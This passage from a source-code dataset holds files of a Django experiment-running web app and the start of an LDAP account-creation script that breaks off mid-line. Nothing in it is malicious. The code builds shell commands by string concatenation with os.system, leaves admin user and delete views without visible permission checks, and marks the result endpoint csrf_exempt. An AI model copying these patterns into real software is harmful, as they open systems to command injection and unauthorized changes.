file needs to be compiled\n if (extension== 'c'):\n os.system(\"gcc \" + newAlg.file.path + \" -o \" + path + name)\n newAlg.command = path + name\n\n newAlg.save()\n\n messages.success(request, \"Algoritmo salvo com successo\")\n\n return HttpResponseRedirect(reverse('listAlgorithm'))\n\n#################### ADMIN - STATISTICS ####################\n\ndef appStatistics(request):\n form = YearChartForm(request.POST or None)\n if request.method == 'POST':\n year = request.POST.get('year')\n else: \n year = '2017' \n\n #Dataset\n items = {}\n #For each algorithm in the database\n for algorithm in Algorithm.objects.all():\n \n data = []\n label = algorithm.nameAlg\n \n for month in range(12):\n qtd = Execution.objects.filter(algorithm=algorithm.pk,date_requisition__month=month+1, date_requisition__year=year).count()\n data.append(qtd)\n \n items[algorithm.nameAlg] = data \n\n return render(request, \"admin/statistics.html\", {'form':form, 'dataset': json.dumps(items)})\n\n#################### ADMIN - USERS ####################\n\ndef listUsers(request):\n title = 'Usuários'\n appUserList = AppUser.objects.filter().order_by('-id')\n\n perPage = AppUser.objects.get(usuario=request.user.id).resultsPerPage\n\n data, pageI = createPagination(request, appUserList, perPage)\n\n context = {\n 'title': title,\n 'data': data,\n 'pagesIndex': pageI,\n }\n\n return render(request, \"admin/users.html\", context)\n\ndef seeUser(request, appUser, authUser):\n\n authUser = User.objects.get(username=authUser)\n appU = AppUser.objects.get(nickname=appUser, usuario=authUser.id)\n\n nickname = appU.nickname\n company = appU.company\n choice = appU.notification\n resultsPerPage = appU.resultsPerPage\n\n email = appU.usuario.email\n staff = appU.usuario.is_staff\n active = appU.usuario.is_active\n\n dataAppUser = {'nickname': nickname, 'company': company, 'choice': choice,'resultsPerPage':resultsPerPage}\n dataUser = {'email': email, 'is_staff': staff,'is_active':active}\n\n appUserForm = AppUserForm(request.POST or None, initial=dataAppUser)\n userForm = UserForm(request.POST or None, initial=dataUser)\n passwdForm = PasswdChangeForm(request.POST or None)\n\n context = {\n 'title': 'Editar Usuário',\n 'appUser': appUser,\n 'authUser': authUser.username,\n 'appUserForm': appUserForm,\n 'userForm': userForm,\n 'passwdForm': passwdForm,\n }\n\n return render(request, 'admin/edit_user.html', context)\n\ndef addUser(request):\n title = 'Novo usuário'\n appForm = AppUserForm(request.POST or None)\n uForm = UserForm(request.POST or None)\n context ={\n 'title': title,\n 'appForm': appForm,\n 'uForm': uForm,\n }\n\n return render(request,'admin/add_user.html',context)\n\ndef saveUser(request):\n username = request.POST.get(\"username\")\n email = request.POST.get(\"email\")\n password = request.POST.get(\"password1\")\n is_active = request.POST.get('is_active')\n\n nickname = request.POST.get(\"nickname\")\n company = request.POST.get(\"company\")\n resultsPerPage = request.POST.get(\"resultsPerPage\")\n notification = request.POST.get(\"choice\")\n\n active = True if is_active == 'on' else False\n\n user = User(username=username, \n email=email, \n is_active=active)\n user.set_password(password)\n user.save()\n\n appUser = AppUser(nickname=nickname,\n company=company,\n resultsPerPage=resultsPerPage,\n notification=notification,\n usuario=user)\n appUser.save()\n\n messages.success(request, \"Usuário criado com sucesso\")\n\n return HttpResponseRedirect(reverse('listUsers'))\n\n\n#################### USER PROFILE / REGISTER #################### \n\ndef getUserProfile(request, username):\n user = User.objects.get(username=username)\n appUser = AppUser.objects.get(usuario=user.id)\n \n email = user.email\n company = appUser.company\n choice = appUser.notification\n resultsPerPage = appUser.resultsPerPage\n\n data={'email':email,'company':company,'choice':choice, 'resultsPerPage': resultsPerPage}\n form = AppUserForm(request.POST or None, initial=data)\n context = {\n 'user': user, \n 'appUser': appUser,\n 'form':form\n }\n return render(request, 'user_profile.html', context) \n\ndef saveProfile(request, uname):\n email = request.POST.get(\"email\")\n company = request.POST.get(\"company\")\n choice = request.POST.get(\"choice\")\n resultsPerPage = request.POST.get(\"resultsPerPage\")\n\n #verificar se duplica email\n authUser = User.objects.filter(username=uname)\n authUser.update(email=email)\n\n appUser = AppUser.objects.filter(usuario=authUser[0].id)\n\n appUser.update(company=company,notification=choice, resultsPerPage=resultsPerPage)\n\n if (request.user.is_superuser and 'nickname' in request.POST.dict()):\n nickname = request.POST.get(\"nickname\")\n is_staff = request.POST.get(\"is_staff\")\n is_active = request.POST.get(\"is_active\")\n\n passwd = request.POST.get(\"new_password1\")\n if(passwd != ''):\n authUser[0].set_password(passwd)\n\n staff = True if is_staff == 'on' else False\n active = True if is_active == 'on' else False\n\n # print(is_active, active)\n appUser.update(nickname=nickname)\n authUser.update(is_staff=staff,is_active=active)\n\n messages.success(request, \"Perfil salvo com sucesso\")\n\n return HttpResponseRedirect(reverse('listUsers'))\n\n messages.success(request, \"Perfil salvo com sucesso\")\n return HttpResponseRedirect(reverse('home'))\n\n # return HttpResponseRedirect(reverse('userProfile', kwargs={'username':uname}))\n\n\ndef register_sucess(request):\n return render(request, \"registration/registration_complete.html\", {})\n\n\n#################### EXPERIMENTS / EXECUTION ####################\n\n@json_view\n@csrf_protect\ndef checkForm(request):\n form = ExecutionForm(request.POST or None) # request POST?\n print(request.POST)\n print (\"\\n\\n\")\n\n if form.is_valid(): # processa\n experiments(request)\n helper = FormHelper()\n helper.form_id = 'form_exec'\n helper.form_action = '.'\n form_html = render_crispy_form(ExecutionForm(None), helper)\n return {'success': True, 'form_html': form_html}\n else:\n helper = FormHelper()\n helper.form_id = 'form_exec'\n helper.form_action = '.'\n form_html = render_crispy_form(form, helper, RequestContext(request))\n return {'success': False, 'form_html': form_html}\n\n@csrf_protect\ndef runExample(request):\n if request.method == 'POST':\n algorithm = request.POST.get('Algoritmo')\n d_User = User.objects.get(username=request.user)\n alg = Algorithm.objects.get(nameAlg=algorithm)\n execution = Execution(\n request_by=d_User.appuser,\n algorithm=alg,\n inputFile=alg.sample\n )\n execution.save()\n\n teste= RunExperiment.delay(alg.command, execution.id, 'yes')\n\n execution.save()\n\n messages.warning(request, \"Experimento criado - ID: \" + str(execution.id))\n \n return HttpResponseRedirect(reverse('home'))\n\n form = ExecutionForm(request.POST or None)\n context = {\n 'form': form\n }\n\n return render(request, \"example.html\", context)\n\n\n@csrf_protect\ndef experiments(request):\n if request.method == 'POST':\n form = ExecutionForm(request.POST, request.FILES or None)\n if not form.is_valid():\n title = \"Experiments %s\" % (request.user)\n context = {\n 'form': form,\n 'title': title,\n }\n return render(request, \"experiments.html\", context)\n \n algorithm = request.POST.get('Algoritmo')\n d_User = User.objects.get(username=request.user)\n \n alg = Algorithm.objects.get(nameAlg=algorithm)\n execution = Execution(\n request_by=d_User.appuser,\n algorithm=alg\n )\n execution.save()\n if (request.FILES):\n # print request.FILES\n fileIn = request.FILES[\"Entrada\"]\n execution.inputFile = fileIn\n execution.save()\n elif (execType=='example'):\n fileIn = alg.sample\n\n if (execution.inputFile==None): inFile = 'none'\n else: inFile = 'yes'\n\n teste= RunExperiment.delay(alg.command, execution.id, inFile)\n messages.warning(request, \"Experimento criado - ID: \" + str(execution.id))\n\n execution.save()\n title = \"Experiments %s\" % (request.user)\n \n return HttpResponseRedirect(reverse('home'))\n form = ExecutionForm(request.POST or None)\n title = \"Experiments %s\" % (request.user)\n\n hlp = {}\n for item in Algorithm.objects.all():\n hlp[item.nameAlg] = [item.desc,str(item.sample)]\n\n context = {\n 'title': title,\n 'form': form,\n 'help': hlp\n }\n return render(request, \"experiments.html\", context)\n \n@csrf_exempt\ndef result(request):\n if request.method == 'POST':\n # print (\"POST\")\n if (request.FILES):\n idExec = request.POST.get(\"id\")\n tempo = request.POST.get(\"time\")\n print(\"id: %s time: %s\" %(idExec,tempo))\n\n execution = Execution.objects.get(id=idExec)\n fileIn = request.FILES[\"file\"]\n execution.outputFile=fileIn\n execution.status=3\n execution.time = tempo\n execution.save()\n\n appUser = execution.request_by\n userEmail = appUser.usuario.email\n\n if (appUser.notification == 'yes'): \n subject = 'Portal Friends - Experimento concluido com sucesso' \n from_email = settings.EMAIL_HOST_USER \n to_email = userEmail\n message = \"Olá \" + appUser.nickname + \" experiencia \" + idExec + \" foi concluida com sucesso\"\n send_mail(subject, message,from_email,[to_email], fail_silently=False)\n return HttpResponse(1)\n\n\n#################### PAGINATION ####################\n\ndef createPagination(request, appList, resultsPerPage):\n paginator = Paginator(appList, resultsPerPage)\n page = request.GET.get('page')\n if page is None:\n page = 1\n try:\n executions = paginator.page(page)\n except PageNotAnInteger:\n executions = paginator.page(1)\n except EmptyPage:\n executions = paginator.page(paginator.num_pages) # da pra tratar\n if paginator.count == 0:\n data = None\n else:\n data = executions\n pageI = paginate(page, paginator)\n\n return data, pageI\n\n\n#################### REMOVE FROM LIST PAGE - ONE OR MANY ####################\n\ndef removeList(request, model):\n if request.method == 'POST':\n data = request.POST.get('data')\n if data:\n ids = data.split(\",\")\n if(model == 'Algoritmos'):\n Algorithm.objects.filter(idAlg__in=ids).delete()\n messages.success(request,\"Algoritmo deletado com sucesso\")\n return HttpResponseRedirect(reverse('listAlgorithm'))\n if(model == 'Home'):\n if(request.user.is_superuser):\n Execution.objects.filter(id__in=ids).delete()\n else:\n Execution.objects.filter(id__in=ids).update(visible='no')\n messages.success(request,\"Experimento deletado com sucesso\")\n return HttpResponseRedirect(reverse('home'))\n if(model == 'Usuários'):\n AppUser.objects.filter(usuario__in=ids).delete()\n User.objects.filter(id__in=ids).delete()\n messages.success(request,\"Usuário deletado com sucesso\")\n return HttpResponseRedirect(reverse('listUsers'))\n"
},
{
"alpha_fraction": 0.6596406102180481,
"alphanum_fraction": 0.6789910197257996,
"avg_line_length": 49.77193069458008,
"blob_id": "b6177b88ae590464059f3714288632b37a6287db",
"content_id": "d700e9e059b5f39c64abd4afcb17c8149da617fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2894,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 57,
"path": "/Django Proj/webapp/webapp/urls.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport webapp.regbackend as regbackend\nimport experiment.views as views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^about/$', views.about, name='about'),\n url(r'^contact/$', views.contact, name='contact'),\n\n # urls experiment\n url(r'^experiments/checkForm$',views.checkForm , name='checkForm'),\n url(r'^experiments/$', views.experiments, name='exp'),\n url(r'^experiments/downloadInputFile', views.downloadInputFile, name='downloadInputFile'),\n url(r'^experiments/downloadOutputFile$', views.downloadOutputFile, name='downloadOutputFile'),\n url(r'^experiment/sample/(?P<alg>[a-zA-Z0-9\\u00C0-\\u00FF_-]+)$', views.downloadSample,name='sampleDownload'),\n url(r'^experiments/result$', views.result, name='result'),\n url(r'^experimemt/example/$', views.runExample, name='example'),\n\n # django admin\n url(r'^Django_admin/', include(admin.site.urls)),\n\n # urls register\n url(r'^accounts/register/', regbackend.MyRegistrationView.as_view(),\n name='register_custom'),\n url(r'^complete/', views.register_sucess, name='complete'),\n url(r'^accounts/', include('registration.backends.default.urls')),\n\n # user profile\n url(r'^profile/(?P<username>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.getUserProfile, name=\"userProfile\"),\n url(r'^profile/(?P<uname>[a-zA-Z0-9\\u00C0-\\u00FF]+)/save', views.saveProfile, name=\"saveProfile\"),\n\n # ADMIN\n url(r'^admin/remove/(?P<model>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.removeList, name=\"removeList\"), #DELETE\n\n # ADMIN algorithm \n url(r'^admin/algorithms/$', views.listAlg, name=\"listAlgorithm\"), #READ\n url(r'^admin/algorithms/(?P<alg>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.seeAlg, name=\"seeAlgorithm\"), #READ\n url(r'^admin/algorithms/(?P<idAlg>[a-zA-Z0-9\\u00C0-\\u00FF]+)/update$',views.updateAlg, name=\"updateAlgorithm\"), #UPDATE\n url(r'^admin/algorithms/addAlgorithm/$', views.addAlg, name=\"addAlgorithm\"), #CREATE\n url(r'^admin/algorithms/addAlgorithm/save',views.saveAlg, name=\"saveAlgorithm\"), #CREATE\n url(r'^admin/algorithms/statistics/$', views.appStatistics, name='appStatistics'),\n\n # ADMIN users\n url(r'^admin/users/$', views.listUsers, name=\"listUsers\"), #READ\n url(r'^admin/users/(?P<appUser>[a-zA-Z0-9\\u00C0-\\u00FF]+)_(?P<authUser>[a-zA-Z0-9\\u00C0-\\u00FF]+)$', views.seeUser, name=\"seeUser\"), #READ\n url(r'^admin/users/addUser/$', views.addUser, name=\"addUser\"), #CREATE \n url(r'^admin/users/addUser/save',views.saveUser, name=\"saveUser\"), #CREATE\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.7643312215805054,
"alphanum_fraction": 0.7834395170211792,
"avg_line_length": 25.16666603088379,
"blob_id": "a801a911050190b08619fde1b305823627095d90",
"content_id": "bc1092049cc8ade07a6ffd3396ff662bfd2d2745",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 6,
"path": "/Django Proj/webapp/rstatic.sh",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nservice httpd stop \npython manage.py collectstatic --noinput\nchmod 776 /home/toor/Documents/static_in_env/static_root/css/*\nservice httpd start\n"
},
{
"alpha_fraction": 0.7166778445243835,
"alphanum_fraction": 0.7173476219177246,
"avg_line_length": 35.414634704589844,
"blob_id": "88221d98395a09d4cdf61667b9f698dd7db7932e",
"content_id": "fcd019d04409525d23d6106748a4257c6679cc1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1493,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 41,
"path": "/Django Proj/webapp/experiment/admin.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import AppUser, Execution, Algorithm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin as AuthUserAdmin\n\n# class AppUserAdminInline(admin.StackedInline):\n# \tmodel = AppUser\n# \tmax_num = 1\n# \tcan_delete = False\n\n# class UserAdmin(AuthUserAdmin):\n# \tlist_display = ['username', 'email']\n# \tdef add_view(self, *args, **kwargs):\n# \t\tself.inlines = []\n# \t\treturn super(UserAdmin, self).add_view(*args, **kwargs)\n\t\n# \tdef change_view(self, *args, **kwargs):\n# \t\tself.inlines = [AppUserAdminInline]\n# \t\treturn super(UserAdmin, self).change_view(*args, **kwargs)\n\n\nclass AppUserAdmin(admin.ModelAdmin):\n\tfields = ['nickname', 'usuario', 'company' , 'resultsPerPage', 'notification']\n\tlist_display = ('nickname', 'usuario', 'company', 'date_register', 'last_access', 'resultsPerPage', 'notification')\n\nclass ExecutionAdmin(admin.ModelAdmin):\n\tfields = ['status','request_by', 'algorithm']\n\tlist_display = ['request_by', 'algorithm', 'time', 'date_requisition', 'status', 'inputFile', 'outputFile']\n\nclass AlgAdmin(admin.ModelAdmin):\n\tfields = ['nameAlg', 'desc', 'command', 'sample', 'file']\n\tlist_display = ['idAlg', 'nameAlg', 'desc', 'sample','file']\n\n# # unregister old user admin\n# admin.site.unregister(User)\n# # register new user admin\n# admin.site.register(User, UserAdmin)\n\nadmin.site.register(AppUser, AppUserAdmin)\nadmin.site.register(Execution, ExecutionAdmin)\nadmin.site.register(Algorithm, AlgAdmin)\n"
},
{
"alpha_fraction": 0.616183876991272,
"alphanum_fraction": 0.622481107711792,
"avg_line_length": 44.35714340209961,
"blob_id": "64ae5c0039905de845d5e11bed4071f80a9071db",
"content_id": "cc28aa53c1b289b151e8b4170d8f8dddf567ec3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3197,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 70,
"path": "/Django Proj/webapp/experiment/forms.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom registration.forms import RegistrationFormUniqueEmail\nfrom .models import Algorithm, Execution\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import SetPasswordForm\n\nclass PasswdChangeForm(SetPasswordForm):\n error_messages = {'password_mismatch': \"As duas senhas não são iguais.\",}\n \n new_password1 = forms.CharField(label=\"Nova senha\",\n widget=forms.PasswordInput,\n required=False)\n new_password2 = forms.CharField(label=\"Confirmação da nova senha\",\n widget=forms.PasswordInput,\n required=False)\n\nclass AppUserForm(RegistrationFormUniqueEmail):\n username = forms.CharField(required=True, label='Usuário', max_length=20, help_text=\"Máximo 20 caracteres\")\n password1 = forms.CharField(required=True,label=\"Senha\", widget=forms.PasswordInput)\n password2 = forms.CharField(label=\"Confirmação da senha\", widget=forms.PasswordInput, help_text=\"Digite a mesma senha do campo anterior\")\n nickname = forms.CharField(required=True, label='Nome', max_length=30)\n company = forms.CharField(required=True, label='Empresa / Instituição', max_length=30)\n resultsPerPage =forms.IntegerField(required=False, initial=10, label=\"Resultados por página\")\n choice = forms.ChoiceField(choices=[('yes','Sim'),('no','Não')], initial='yes', widget=forms.Select, required=False,label=\"Notificação da conclusão de execuções por email?\")\n\nclass UserForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['email','password','user_permissions','is_staff', 'is_active', 'user_permissions']\n labels = {\n 'email': 'Email',\n 'password': 'Senha',\n 'user_permissions': 'Permissões',\n 'is_staff': 'Administrador', \n 'is_active': 'Conta Ativa', \n }\n help_text = {\n 'is_active': 'Define se a conta está ativa',\n }\n\nclass ExecutionForm(forms.Form):\n Algoritmo = forms.ModelChoiceField(queryset=Algorithm.objects.all(),\n empty_label='---Selecione um algoritmo---',\n required=True,\n to_field_name='nameAlg',\n )\n Entrada = forms.FileField(required=False)\n\n\nclass ContactForm(forms.Form):\n nome = forms.CharField()\n email = forms.EmailField()\n mensagem = forms.CharField(widget=forms.Textarea(attrs={'rows': 5}))\n\nclass YearChartForm(forms.Form):\n years =[]\n for date in Execution.objects.dates('date_requisition','year'): years.append((date.year,date.year))\n\n year = forms.ChoiceField(choices=years, initial='2017', widget=forms.Select(attrs={'max_length': 4}), required=True, label=\"Selecione um ano\")\n\nclass AlgorithmForm(forms.ModelForm):\n class Meta:\n model = Algorithm\n fields = ['nameAlg','desc','sample','file']\n labels = {\n 'nameAlg': 'Algoritmo',\n 'desc': 'Descrição',\n 'sample': 'Exemplo de entrada',\n 'file': 'Arquivo' \n }\n\n"
},
{
"alpha_fraction": 0.6929577589035034,
"alphanum_fraction": 0.7037558555603027,
"avg_line_length": 41.560001373291016,
"blob_id": "176412a842f925e4631479b947d56308f609767a",
"content_id": "a5f856f5a13f65993baac768f366b21fb670d156",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2132,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 50,
"path": "/Django Proj/webapp/experiment/models.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\nclass Algorithm(models.Model):\n idAlg = models.AutoField(primary_key=True)\n nameAlg = models.CharField(null=False, blank=False, max_length=100)\n desc = models.CharField(null=True, blank=False, max_length=500)\n command = models.CharField(null=False, blank=False, max_length=100)\n sample = models.FileField(upload_to=\"samples/\", null=True, blank=True)\n file = models.FileField(upload_to=\"algorithms/\", null=True, blank=True)\n\n def __str__(self):\n return self.nameAlg\n\n\nclass AppUser(models.Model):\n nickname = models.CharField(\n default='default', max_length=30, blank=False, null=True)\n company = models.CharField(\n default='default', max_length=50, blank=False, null=True)\n usuario = models.OneToOneField(User)\n date_register = models.DateField('date_register', auto_now_add=True)\n last_access = models.DateField('last_access', auto_now=True)\n resultsPerPage = models.IntegerField(default=10)\n notification = models.CharField(default=\"yes\", choices=((\"yes\",\"Sim\"),(\"no\",\"Não\")), max_length=4, blank=True)\n\n def __str__(self):\n return self.nickname\n\n\ndef user_directory_path_in(instance, filename):\n return './users/user_{0}/{1}/input'.format(instance.request_by.usuario.id, instance.id)\n\n\ndef user_directory_path_out(instance, filename):\n return './users/user_{0}/{1}/output'.format(instance.request_by.usuario.id, instance.id)\n\n\nclass Execution(models.Model):\n request_by = models.ForeignKey(AppUser)\n date_requisition = models.DateField('date_requisition', auto_now_add=True)\n status = models.IntegerField(default=1)\n algorithm = models.ForeignKey(Algorithm, null=True, blank=False)\n inputFile = models.FileField(upload_to=user_directory_path_in, null=True)\n outputFile = models.FileField(upload_to=user_directory_path_out, null=True)\n time = models.FloatField(default=-1)\n visible = models.CharField(choices=((\"yes\",\"Sim\"),(\"no\",\"Não\")), default='yes',blank=False,null=False, max_length=3)\n\n def __int__(self):\n return self.request_by.id \n"
},
{
"alpha_fraction": 0.5368266701698303,
"alphanum_fraction": 0.5485525727272034,
"avg_line_length": 23.809091567993164,
"blob_id": "2ffeab612924e6d51d0f347b69fb338c0692d999",
"content_id": "b08472a1ca804d008a6974914df515071a2f6c5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2732,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 110,
"path": "/Django Proj/webapp/static_in_pro/our_static/js/experiment.js",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "function setHandlers(){\n\t$('#id_PresetExecution').on(\"change\", function(){\n\t\tvar opcao = $('#id_PresetExecution').val();\n\t\tconsole.log(opcao);\n\t\tvar algSelect = $('#id_PresetExecution option:selected').text();\n\t\tif(opcao){\n\t\t\t$(\"#id_Algorithm option\").filter(function() {\n\t\t \t\treturn $(this).text() == algSelect; \n\t\t\t}).prop('selected', true);\n\t\t\t$(\"#id_opt\").val('');\n\t\t\t$(\"#id_Algorithm\").prop('disabled', true);\t\n\t\t\t$(\"#id_opt\").prop('disabled', true);\n\t\t\t$(\"#id_fileIn\").prop('disabled', true);\n\n\t\t}else{\n\t\t\t$('select#id_Algorithm').prop('selectedIndex', 0);\n\t\t\t$(\"#id_opt\").val('');\t\n\t\t\t$(\"#id_Algorithm\").prop('disabled', false);\t\n\t\t\t$(\"#id_opt\").prop('disabled', false);\n\t\t\t$(\"#id_fileIn\").prop('disabled', false\t);\n\t\t}\n\t});\n};\n\nfunction setAlgorithmDescription(){\n\thlpButtom = document.getElementById('showDesc')\n\tdiv = document.getElementById('hlpAlg');\n\n\thlpButtom.addEventListener(\"click\", function(){\n\tdiv.style.display = (div.style.display === 'block') ? 'none':'block';\n\t})\n}\n\nfunction randomColor(type){\n\t//pick a \"red\" from 0 - 255\n\tvar r = Math.floor(Math.random() * 256);\n\t//pick a \"red\" from 0 - 255\n\tvar g = Math.floor(Math.random() * 256);\n\t//pick a \"red\" from 0 - 255\n\tvar b = Math.floor(Math.random() * 256);\n\t\n\treturn [\"rgba(\" + r + \", \" + g + \", \" + b + \", 1)\",\"rgba(\" + r + \", \" + g + \", \" + b + \", 0.1)\"];\n\t\n}\n\n\nfunction drawStatisticsChart(){\n\t\n\tvar chartCanvas= document.getElementById(\"appChart\").getContext('2d');\n\tvar chartLabel = ['Jan.', 'Feb.', 'Mar.', 'Apr.', 'May', 'June', 'July', 'Aug.', 'Sept.', 'Oct.', 'Nov.', 'Dec.'];\n\tvar chartDataset = [];\n\n\tfor(var key in dt){\n\t\tvar algDataset = {}\n\t\tif (dt.hasOwnProperty(key)){\n \tvar value=dt[key];\n \t\n \talgDataset['label'] = key;\n \talgDataset['data'] = value;\n\n \tvar dataColor = randomColor();\n\n \talgDataset['borderColor'] = dataColor[0];\n \t// algDataset['backgroundColor'] = dataColor[1];\n\n \t}\n \tchartDataset.push(algDataset);\n\t}\n \n \t// draw the chart\n\tvar productsChart = new Chart(chartCanvas,{\n \ttype: 'line',\n \tdata: {\n \tlabels: chartLabel,\n \tdatasets: chartDataset\n \t},\n \toptions: {\n \t\t\ttitle: {\n \t\t\tdisplay: true,\n \t\t\ttext: 'Número de execuções dos algoritmos - 2017'\n \t\t\t},\n \t\t\tscales:{\n \t\t\t\txAxes: [{\n \tgridLines: {\n \tdisplay:false\n \t}\n \t}],\n \t\t\tyAxes: [{\n \tgridLines: {\n \tdisplay:false\n \t} \n \t}]\n \t\t\t}\n\t\t}\n\t});\n}\n\n\n// Call Functions\n// setHandlers();\n\nif(document.getElementById('showDesc')){\n\tsetAlgorithmDescription();\t\n}\n\nelse if(document.getElementById(\"appChart\")){\n\t drawStatisticsChart();\n}\n\n// setTriggers();\n"
},
{
"alpha_fraction": 0.5783460140228271,
"alphanum_fraction": 0.592491865158081,
"avg_line_length": 33.67924499511719,
"blob_id": "165aefbd2f36991b1ea12cf1fd0473d93f8c677d",
"content_id": "a1ba282b60fbe405bfa2b87e458fbb60756eb88f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1838,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 53,
"path": "/Django Proj/webapp/experiment/tasks.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from experiment.models import AppUser, Execution\nfrom celery.utils.log import get_task_logger\nfrom celery.decorators import task\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nimport requests\nimport os\nimport time\n\nlogger = get_task_logger(__name__)\n\n@task(name=\"RunExperiment\")\ndef RunExperiment(execution, ide, inputFile='yes'):\n print(\"\\n Executando o exp %s, algoritmo: %s\" % (ide, execution))\n # os.system(\"if [! -d 'executions/']; then mkdir executions; fi\")\n os.system(\"mkdir executions/\" + str(ide))\n\n if(inputFile == 'yes'):\n os.system(\"wget http://200.201.194.150/experiments/downloadInputFile?id=\" +\n str(ide) + \" -O ./executions/\" + str(ide) + \"/input\")\n start = time.time()\n os.system(execution + \" executions/\" + str(ide) + \"/input > executions/\" + str(ide) + \"/output\")\n else:\n start = time.time()\n os.system(execution + \" > executions/\" + str(ide) + \"/output\")\n dur = time.time() - start\n \n print (dur)\n \n files={'file': str(\"/executions/\"+str(ide)+\"/output\")}\n path = str(\"executions/\" + str(ide)+\"/output\")\n print (path)\n \n files = {'file': open(path, 'rb')}\n data = {'id':str(ide),'time':dur}\n \n r = requests.post('http://200.201.194.150/experiments/result', files=files,data=data)\n print (r.status_code, r.reason)\n \n return r.status_code\n # execution.status = 2\n # execution.save()\n # start = time.time()\n # os.system(query)\n # dur = time.time() - start\n # print dur\n # execution.status = 3\n # user = execution.request_by\n # user.notes.add(nota)\n # user.save()\n # execution.time = dur\n # execution.outputFile = queryOutputFile\n # execution.save()\n"
}
] | 10 |
rossKayHe/sxg-access-mgmt
|
https://github.com/rossKayHe/sxg-access-mgmt
|
a87da7780e0ee5a0ad74cbe9f3d77848cb6f19e9
|
a7b7fea620fc2245f3c1e6b371b71552249ac6b3
|
2d41c97b746e433662fee6556c1fbdf21f4b4ac1
|
refs/heads/master
| 2020-09-28T05:56:47.264013 | 2019-12-08T17:36:17 | 2019-12-08T17:36:17 | 226,705,603 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.554347813129425,
"alphanum_fraction": 0.569972813129425,
"avg_line_length": 36.730770111083984,
"blob_id": "bd99711350faa0a5d2d3aeb4645421ddca6d0d21",
"content_id": "e15ce909efe29c72c547b86d11d010a1ebe86a4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2944,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 78,
"path": "/ldapcreateuser.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser, re \nfrom ldap3 import Connection, ALL, core, MODIFY_REPLACE\n\nusername = sys.argv[1]\npassword = sys.argv[2]\nbase_dn = sys.argv[3]\ndomain = sys.argv[4]\ndesc = sys.argv[5]\nuser_dn = 'cn=' + username + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif user_search:\n print (\"User\", username, \"already exists in AD\") \n sys.exit(1)\n\n# Lets build our user: Disabled to start (514)\nuser_attrs = {'objectClass': ['top', 'person', 'organizationalPerson', 'user'], \\\n 'cn': username, \\\n 'userPrincipalName': username + '@' + domain, \\\n 'sAMAccountName': username, \\\n 'givenName': username, \\\n 'sn': username, \\\n 'displayName': username, \\\n 'description': desc, \\\n 'userAccountControl': '514'}\n\n# if base_dn like svc \nif re.match(r\"OU=SVC*\", base_dn):\n # Prep the password\n unicode_pass = '\\\"' + password + '\\\"'\n password_value = unicode_pass.encode('utf-16-le')\n add_pass = {'unicodePwd': [(MODIFY_REPLACE, [password_value])]}\n # 512 will set user account to enabled. 65536 sets password does not expire\n mod_acct = {'userAccountControl': [(MODIFY_REPLACE, '66048')]}\n\n# Add the new user account\nldap_connection.add(user_dn, attributes=user_attrs)\n\nif ldap_connection.result['result'] !=0:\n print (\"Error adding new user: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# if base_dn like svc \nif re.match(r\"OU=SVC*\", base_dn):\n # Add the password\n ldap_connection.modify(user_dn, add_pass)\n if ldap_connection.result['result'] != 0:\n print (\"Error setting password: %s\" % 